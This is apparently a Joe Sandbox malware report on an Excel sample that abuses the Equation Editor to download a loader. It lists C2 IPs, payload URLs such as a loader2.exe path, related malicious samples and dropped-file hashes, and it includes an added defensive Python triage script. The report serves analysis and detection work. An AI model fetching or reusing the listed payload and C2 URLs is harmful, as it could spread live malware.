http://www.%s.comPA | vbc.exe, 00000004.00000002.2149612513.0000000002330000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2153195546.0000000001C70000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | low
http://ariadna.elmundo.es/ | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.news.com.au/favicon.ico | explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown

                                                                                                                                                  Contacted IPs


                                                                                                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.210.173.40 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
154.84.76.49 | www.alberthospice.com | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true
45.195.169.197 | www.meganfantastic.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true

                                                                                                                                                  Private

                                                                                                                                                  IP
                                                                                                                                                  127.0.0.1

                                                                                                                                                  General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433039
Start date: 11.06.2021
Start time: 08:05:32
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 53s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: L2.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@9/21@8/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 21.5% (good quality ratio 20.7%)
• Quality average: 76.1%
• Quality standard deviation: 26.9%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 172.67.150.126, 104.21.89.254
• Excluded domains from analysis (whitelisted): www.sciencebasedmasks.com.cdn.cloudflare.net
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

Time | Type | Description
08:07:02 | API Interceptor | 65x Sleep call for process: EQNEDT32.EXE modified
08:07:08 | API Interceptor | 35x Sleep call for process: vbc.exe modified
08:07:28 | API Interceptor | 254x Sleep call for process: control.exe modified
08:08:26 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

Match | Associated Sample Name / URL | Detection | Context
192.210.173.40 | Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | malicious | 192.210.173.40/files/loader1.exe
192.210.173.40 | MT103-payment confirmation.xlsx | malicious | 192.210.173.40/files/loader2.exe
192.210.173.40 | Agency Appointment for Mv TBN Port-Appointment Letter- 2100133.xlsx | malicious | 192.210.173.40/files/loader1.exe
154.84.76.49 | MT103-payment confirmation.xlsx | malicious | www.alberthospice.com/sh2m/?9rfdV=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w==&LP98=qtatzL

                                                                                                                                                  Domains

Match | Associated Sample Name / URL | Detection | Context
www.alberthospice.com | MT103-payment confirmation.xlsx | malicious | 154.84.76.49

                                                                                                                                                  ASN

Match | Associated Sample Name / URL | Detection | Context
AS-COLOCROSSINGUS | Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | malicious | 192.210.173.40
AS-COLOCROSSINGUS | Request Letter for Courtesy Call.xlsx | malicious | 198.12.110.183
AS-COLOCROSSINGUS | ORDEN 47458.xlsx | malicious | 198.12.110.183
AS-COLOCROSSINGUS | Descuentos de hasta el 40%.xlsx | malicious | 198.12.110.183
AS-COLOCROSSINGUS | crt9O3URua.exe | malicious | 198.23.140.76
AS-COLOCROSSINGUS | _VM0_03064853.HtM | malicious | 23.94.52.94
AS-COLOCROSSINGUS | 1LvgZjt4iv.exe | malicious | 198.46.177.119
AS-COLOCROSSINGUS | PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx | malicious | 198.23.221.170
AS-COLOCROSSINGUS | Purchase Order Price List 061021.xlsx | malicious | 198.12.127.155
AS-COLOCROSSINGUS | xYKsdzAUj8.exe | malicious | 192.210.198.12
AS-COLOCROSSINGUS | lsQ72VytAw.exe | malicious | 192.210.198.12
AS-COLOCROSSINGUS | EDxI6b8IKs.exe | malicious | 192.210.198.12
AS-COLOCROSSINGUS | ouGTVjHuUq.exe | malicious | 192.210.198.12
AS-COLOCROSSINGUS | vbc.xlsx | malicious | 107.173.219.35
AS-COLOCROSSINGUS | PO.xlsx | malicious | 198.12.110.183
AS-COLOCROSSINGUS | Duplicated Orders.xlsx | malicious | 198.12.110.183
AS-COLOCROSSINGUS | pago.xlsx | malicious | 192.227.228.121
AS-COLOCROSSINGUS | DEPOSITAR.xlsx | malicious | 198.12.110.183
AS-COLOCROSSINGUS | HT.xlsx | malicious | 198.12.110.183
AS-COLOCROSSINGUS | order 4806125050.xlsx | malicious | 192.227.228.121
DXTL-HKDXTLTseungKwanOServiceHK | GiG35Rwmz6.exe | malicious | 154.214.84.117
DXTL-HKDXTLTseungKwanOServiceHK | RFQ-21-QAI-OPS-0067 (7000000061).exe | malicious | 154.84.83.5
DXTL-HKDXTLTseungKwanOServiceHK | kmEVWJjPV6esObh.exe | malicious | 45.203.107.209
DXTL-HKDXTLTseungKwanOServiceHK | rtgs_pdf.exe | malicious | 154.218.86.231
DXTL-HKDXTLTseungKwanOServiceHK | Invoice number FV0062022020.exe | malicious | 154.80.207.57
DXTL-HKDXTLTseungKwanOServiceHK | MT103-payment confirmation.xlsx | malicious | 154.84.76.49
DXTL-HKDXTLTseungKwanOServiceHK | New Order Vung Ang TPP Viet Nam.exe | malicious | 45.194.139.173
DXTL-HKDXTLTseungKwanOServiceHK | 17jLieeOPx.exe | malicious | 156.237.130.173
DXTL-HKDXTLTseungKwanOServiceHK | SKMBT41085NC9.exe | malicious | 154.212.65.23
DXTL-HKDXTLTseungKwanOServiceHK | Product_Samples.exe | malicious | 154.95.193.124
DXTL-HKDXTLTseungKwanOServiceHK | RE; KOC RFQ for Flangers - RFQ 22965431.exe | malicious | 154.83.72.159
DXTL-HKDXTLTseungKwanOServiceHK | RE KOC RFQ for Flanges - RFQ 2074898.exe | malicious | 154.83.72.159
DXTL-HKDXTLTseungKwanOServiceHK | item.exe | malicious | 154.95.193.124
DXTL-HKDXTLTseungKwanOServiceHK | Payment SWIFT_Pdf.exe | malicious | 45.199.77.202
                                                                                                                                                  Payment Advice-Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.199.77.202
                                                                                                                                                  Ack0527073465.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.93.191.132
                                                                                                                                                  PO#270521.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.80.241.154
                                                                                                                                                  List doc__Pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 156.238.108.75
                                                                                                                                                  #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 156.239.112.237
                                                                                                                                                  Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                                                                                                                  • 45.199.37.6
                                                                                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHKtriage_dropped_file.exeGet hashmaliciousBrowse
                                                                                                                                                  • 107.151.118.54
                                                                                                                                                  fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.142.209
                                                                                                                                                  PROFORMA INVOICE PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.51.167.23
                                                                                                                                                  Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.51.167.23
                                                                                                                                                  LQrGhleECP.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.220.41.208
                                                                                                                                                  Shipping Docs677.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.201.218.227
                                                                                                                                                  Benatos June Order-Project 2021 Specification Document and company Profile _PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.220.38.217
                                                                                                                                                  Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.142.50
                                                                                                                                                  PO#270521.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.213.230.241
                                                                                                                                                  ORDER LIST.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.51.167.23
                                                                                                                                                  pago sunat 250521.exeGet hashmaliciousBrowse
                                                                                                                                                  • 83.150.226.209
                                                                                                                                                  Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.86.39.23
                                                                                                                                                  xhbUdeAoVP.exeGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.11.194
                                                                                                                                                  Purchase Inquiry&Product Specification.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.86.39.23
                                                                                                                                                  New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.92.68.17
                                                                                                                                                  f268bad6_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.137.188
                                                                                                                                                  RFQ - 001.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 160.124.11.194
                                                                                                                                                  vZMIGFMR.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.201.247.101
                                                                                                                                                  28084876_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.213.62.167
                                                                                                                                                  Ydomibnfzakfagtujeyntncjklfpfrinlj_Signed_.exeGet hashmaliciousBrowse
                                                                                                                                                  • 154.216.241.129

JA3 Fingerprints

No context

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dll | Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | | malicious | |
 | New Order PO2193570O1.pdf.exe | | malicious | |
 | 2320900000000.exe | | malicious | |
 | CshpH9OSkc.exe | | malicious | |
 | 5SXTKXCnqS.exe | | malicious | |
 | i6xFULh8J5.exe | | malicious | |
 | AWB00028487364 -000487449287.doc | | malicious | |
 | 090049000009000.exe | | malicious | |
 | dYy3yfSkwY.exe | | malicious | |
 | PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx | | malicious | |
 | Purchase Order Price List 061021.xlsx | | malicious | |
 | Proforma Invoice and Bank swift-REG.PI-0086547654.exe | | malicious | |
 | UGGJ4NnzFz.exe | | malicious | |
 | Proforma Invoice and Bank swift-REG.PI-0086547654.exe | | malicious | |
 | 3arZKnr21W.exe | | malicious | |
 | Shipping receipt.exe | | malicious | |
 | New Order TL273723734533.pdf.exe | | malicious | |
 | YZ8OvkljWm.exe | | malicious | |
 | U03c2doc.exe | | malicious | |
 | QUOTE061021.exe | | malicious | |

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: downloaded
Size (bytes): 224710
Entropy (8bit): 7.912728398567341
Encrypted: false
SSDEEP: 6144:Ds9p+npLadPGnTF8SnI8ey8uLSJB6+i940vqC7J:yptdenTiSnI8ethi9aaJ
MD5: 8C35AC8D43F7E59105902FA16114144E
SHA1: C1A0E5DE1121E55C22649182C923B41EFD4E2848
SHA-256: 1A08FC838C4EBAB6B986B6010E2074A05C29916CD38096E7F7D26A6455917508
SHA-512: F89DA0804389F71E3627B9BCC5299D6EAAB0649197D1084FB3B6F63E4BD126BAF333C9781AA02C3666AC59E79CB645487CFDBE19061B1C5119098529BFBD7F18
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 23%
• Antivirus: ReversingLabs, Detection: 41%
Reputation: low
IE Cache URL: http://192.210.173.40/files/loader2.exe
                                                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................
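The record above is the sandbox's per-artifact triage: writing process, magic-based file type, size, 8-bit entropy, the MD5/SHA-1/SHA-256/SHA-512 set, and the fact that the Equation Editor (EQNEDT32.EXE) wrote a PE into the IE cache. The following Python reproduces those fields for an arbitrary byte string and flags that pattern. It is an added example, not code from Joe Sandbox, from this report, or from the analysed sample; the entropy threshold, the rule names and the constructed 68-byte PE stub are this example's own assumptions (the sandbox's "Encrypted" heuristic is not reproduced).

```python
"""Per-file triage in the shape of a sandbox 'Created / dropped Files' record.

Added example (not Joe Sandbox code). Computes the record's hash set, 8-bit
Shannon entropy and a magic-byte type, and raises flags for the pattern shown
above: a PE written by EQNEDT32.EXE into Temporary Internet Files.
"""
import hashlib
import math
import struct
from collections import Counter
from dataclasses import dataclass

HIGH_ENTROPY = 7.9  # assumed triage threshold; packed/compressed data sits near 8.0


@dataclass
class DropRecord:
    process: str            # image path of the writing process ("Process:" field)
    path: str               # where the file landed
    data: bytes             # full file bytes (the report only shows a masked preview)
    category: str = "dropped"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 .. 8.0 ("Entropy (8bit)")."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """Upper-case hex digests, matching the report's MD5/SHA1/SHA-256/SHA-512 lines."""
    return {alg: hashlib.new(alg, data).hexdigest().upper()
            for alg in ("md5", "sha1", "sha256", "sha512")}


def sniff_type(data: bytes) -> str:
    """Magic-byte classification for the three formats in the record list."""
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "PNG"
    if data[:3] == b"\xff\xd8\xff":
        return "JPEG"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        # e_lfanew at offset 0x3C points at the "PE\0\0" signature.
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "PE"
        return "MZ (no PE header)"
    return "unknown"


def triage(rec: DropRecord) -> dict:
    """Build the record fields plus flags (flag names are this example's own)."""
    kind = sniff_type(rec.data)
    ent = shannon_entropy(rec.data)
    proc = rec.process.rsplit("\\", 1)[-1].upper()
    flags = []
    # The Equation Editor has no business writing executables anywhere.
    if proc == "EQNEDT32.EXE" and kind == "PE":
        flags.append("pe_dropped_by_equation_editor")
    # A PE in the IE cache means it was fetched over HTTP, as "Category: downloaded" shows.
    if "\\Temporary Internet Files\\" in rec.path and kind == "PE":
        flags.append("pe_in_ie_cache")
    if ent >= HIGH_ENTROPY:
        flags.append("high_entropy")
    return {"type": kind, "size": len(rec.data), "entropy": round(ent, 4),
            **file_hashes(rec.data), "flags": flags}


def minimal_pe() -> bytes:
    """Constructed stub: DOS header with e_lfanew=0x40, followed by 'PE\\0\\0'."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\x00\x00"


if __name__ == "__main__":
    # Constructed record mirroring the loader2[1].exe entry above, with stub bytes.
    rec = DropRecord(
        process=r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
        path=r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
             r"\Content.IE5\ZAE7RW1P\loader2[1].exe",
        data=minimal_pe(),
        category="downloaded",
    )
    for k, v in triage(rec).items():
        print(f"{k}: {v}")
```

Run it against the real dropped file (`data=open(path, "rb").read()`) and the hash lines and the entropy value should match the record above to the precision shown; the flags are the part the record does not print and the part a detection engineer would turn into a rule.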
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\109F14E4.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 50311
Entropy (8bit): 7.960958863022709
Encrypted: false
SSDEEP: 768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5: 4141C7515CE64FED13BE6D2BA33299AA
SHA1: B290F533537A734B7030CE1269AC8C5398754194
SHA-256: F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512: 74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                                                          Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\277819E7.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category: dropped
Size (bytes): 8815
Entropy (8bit): 7.944898651451431
Encrypted: false
SSDEEP: 192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5: F06432656347B7042C803FE58F4043E1
SHA1: 4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256: 409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512: 358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious: false
Reputation: moderate, very likely benign file
                                                                                                                                                                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B5D57E6.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):49744
Entropy (8bit):7.99056926749243
Encrypted:true
SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:false
Reputation:moderate, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32802092.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):79394
Entropy (8bit):7.864111100215953
Encrypted:false
SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:16925690E9B366EA60B610F517789AF1
SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:false
Reputation:moderate, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44AAE795.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:dropped
Size (bytes):8815
Entropy (8bit):7.944898651451431
Encrypted:false
SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:F06432656347B7042C803FE58F4043E1
SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62FA5ABC.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):79394
Entropy (8bit):7.864111100215953
Encrypted:false
SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:16925690E9B366EA60B610F517789AF1
SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8592FDFE.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):50311
Entropy (8bit):7.960958863022709
Encrypted:false
SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5:4141C7515CE64FED13BE6D2BA33299AA
SHA1:B290F533537A734B7030CE1269AC8C5398754194
SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious:false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\936B5B39.emf
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):7608
Entropy (8bit):5.091127811854214
Encrypted:false
SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
MD5:EB06F07412A815AED391F20298C1087B
SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
Malicious:false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94CC6BB1.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):84203
Entropy (8bit):7.979766688932294
Encrypted:false
SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:208FD40D2F72D9AED77A86A44782E9E2
SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0535E70.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):49744
Entropy (8bit):7.99056926749243
Encrypted:true
SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:false
